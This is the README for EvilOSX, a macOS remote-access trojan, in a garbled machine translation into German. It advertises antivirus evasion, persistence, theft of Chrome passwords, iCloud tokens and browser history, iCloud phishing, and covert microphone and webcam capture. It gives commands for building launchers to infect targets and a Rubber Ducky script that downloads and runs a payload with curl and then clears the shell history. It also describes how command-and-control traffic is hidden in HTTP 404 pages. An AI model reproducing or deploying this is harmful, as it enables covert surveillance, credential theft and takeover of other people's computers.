EvilOSX

Marco Generator von Cedric Owens

• Eine Terminalinstanz emulieren
• Einfaches erweiterbares Modulsystem
• Keine Bot -Abhängigkeiten (reines Python)
• Unbekannt durch Anti-Virus (OpenSSL AES-256 verschlüsselte Nutzlasten)
• Hartnäckig
• GUI und CLI -Unterstützung
• Chrome Passwörter abrufen
• Rufen Sie iCloud -Token und Kontakte ab
• Abrufen/überwachen Sie die Zwischenablage
• Browsergeschichte abrufen (Chrom und Safari)
• Phish für iCloud -Passwörter über iTunes
• iTunes (iOS) Backup -Aufzählung
• Nehmen Sie das Mikrofon auf
• Machen Sie mit der Webcam einen Desktop -Screenshot oder ein Bild
• Versuchen Sie, die Wurzel durch lokale Eskalation zu erhalten

 # Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Go into the repository
$ cd EvilOSX

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python start.py

# Lastly, run a built launcher on your target(s)

Warnung: Da Nutzlasten für das Zielsystem (automatisch vom Server) einzigartig erstellt werden, muss der Server ausgeführt werden, wenn ein Bot zum ersten Mal eine Verbindung herstellt.

Es gibt auch eine CLI für diejenigen, die dies über SSH verwenden möchten:

 # Create a launcher to infect your target(s)
$ python start.py --builder

# Start the CLI
$ python start.py --cli --port 1337

# Lastly, run a built launcher on your target(s) 

Dieses Projekt wurde erstellt, um mit meinem Gummi Ducky verwendet zu werden. Hier ist das einfache Skript:

 REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER

• Es dauert ungefähr 10 Sekunden, um einen entsperrten Mac zu hinterlassen, was ...... schön ist
• Termina L wird auf diese Weise absichtlich geschrieben, und es wird das Terminal ansonsten nicht finden.
  
• Um den Tastatur -Setup -Assistenten zu umgehen, stellen Sie sicher, dass Sie das VID & PID ändern, der hier zu finden ist.
  Aluminiumtastatur (ISO) ist wahrscheinlich die, die Sie suchen.

Evilosx wird so weit wie möglich unter den Richtlinien der semantischen Versioning aufrechterhalten.
Server- und Bot -Versionen werden mit dem folgenden Format nummeriert:

 <major>.<minor>.<patch>

Und mit den folgenden Richtlinien erstellt:

• Rückwärtskompatibilität (mit älteren Bots) den Major stoßen
• Neuer Ergänzungen, ohne die Rückwärtskompatibilität zu brechen
• Fehlerbehebungen und Misc -Änderungen stoßen den Patch an

Weitere Informationen zu Semver finden Sie unter https://semver.org/.

• Das Infizieren einer Maschine ist in drei Teile aufgeteilt:
  • Ein Launcher wird auf dem Zielgerät ausgeführt, dessen einziges Ziel es ist, den Stager zu betreiben
  • Der Stager fragt den Server nach einem Loader , der mit der geladenen Nutzlast behandelt wird
  • Der Lader erhält eine einzigartig verschlüsselte Nutzlast und dann an den Stager zurück
• Der Server verbirgt seine Mitteilungen, indem er Nachrichten in HTTP 404 -Fehlerseiten sendet (von Blackhats "Versteck in Sichtweite")
  • Befehlsanforderungen werden über eine Get -Anforderung vom Server abgerufen
  • Befehlsantworten werden über eine Postanforderung an den Server gesendet
• Module nutzen die dynamische Natur von Python, sie werden einfach über das mit ZLIB komprimierte Netzwerk zusammen mit allen Konfigurationsoptionen gesendet
• Da der Bot nur mit dem Server kommuniziert und niemals umgekehrt ist, kann der Server keine Möglichkeit haben zu wissen, wann ein Bot offline geht

Fühlen Sie sich frei, hier Probleme oder Feature -Anfragen einzureichen.

Für eine einfache Anleitung zum Erstellen von Modulen klicken Sie hier.

• Das Awesome Empire Project
• Ruf an Patrick Wardle für seine großartigen Gespräche, schau dir das Ziel an.
• MANWOAMI für seine Projekte: Osxchromdecrypt, Mmetokendecrypt, iCloudContacts
  (Jetzt gelöscht ... Lassen Sie mich wissen, wenn Sie wieder auftauchen)
• Das Slowloris -Modul ist so ziemlich aus Pyslowloris kopiert
• Urwid und dieser Code, der mir viel Zeit mit der CLI gespart hat
• Logo von Motusora erstellt

GPLV3